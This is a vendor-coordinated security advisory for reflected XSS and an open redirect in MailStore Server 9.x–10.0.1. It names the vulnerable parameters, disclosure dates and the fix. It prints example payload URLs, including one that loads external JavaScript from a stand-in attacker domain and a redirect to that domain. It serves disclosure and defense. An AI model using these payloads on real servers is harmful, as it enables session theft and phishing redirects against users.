secuvera-SA-2017-02: Reflected XSS and Open Redirect in MailStore Server Affected Products MailStore Server Version 10.0.1.12148 was tested according to the vendor: - MailStore 9.2 to 10.0.1 is affected by the Reflected XSS Vulnerability - Mailstore 9.0 to 10.0.1 is affected by the Open Redirect Vulnerability References https://www.secuvera.de/advisories/secuvera-SA-2017-02.txt CWE-79 https://cwe.mitre.org/data/definitions/79.html CWE-601 https://cwe.mitre.org/data/definitions/601.html Summary: "MailStore Server is one of the worldas leading solutions for email archiving, management and compliance for small and medium-sized businesses." The in-built Webapplication does not properly validate untrusted input in several variables. This leads to both Reflected Cross-Site-Scripting (XSS) and an Open Redirect. Effect: To exploit the reflected XSS, the victim has to be authenticated to the Mailstore Webapplication. By clicking on a link sent to a victim, an attacker could for example copy the victims Session-ID to his on data sink. Sending another link with a crafted URL, the attacker could redirect the victim to a malicious website, while the link itself points to the trusted Mailstore-Address. The victim is not required to be authenticated. Vulnerable Scripts Reflected XSS for authenticated users: /search-result/, Parameters c-f, c-q, c-from and c-to /message/ajax/send/, Parameter recipient Vulnerable Script Open Redirect: derefer/, Parameter url Example for reflected XSS: https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cimg%20src=x%20onerror=alert%280%29%3E #Load external JS-Code https://www.example.com:8462/a/10.0.1.12148/search-result/?c-q=test&c-f=x%3C/script%3E%3Cscript%20SRC=//www.boeserangreifer.de/script.js%3E Example for Open Redirect: https://www.example.com:8462/a/10.0.1.12148/derefer/?url=http%3a%2f%2fwww.boeserangreifer.de Solution: Update to Version 10.0.2 Disclosure Timeline: 2017/01/09 vendor contacted 2017/01/10 initial vendor response asking for technical details 2017/01/10 provided vendor with the advisory including technical details 2017/01/13 vendor provided informations about affected versions and mitigation 2017/01/18 update published by vendor 2017/01/31 public disclosure Credits: Tobias Glemser tglemser@secuvera.de secuvera GmbH https://www.secuvera.de Disclaimer: All information is provided without warranty. The intent is to provide information to secure infrastructure and/or systems, not to be able to attack or damage. Therefore secuvera shall not be liable for any direct or indirect damages that might be caused by using this information.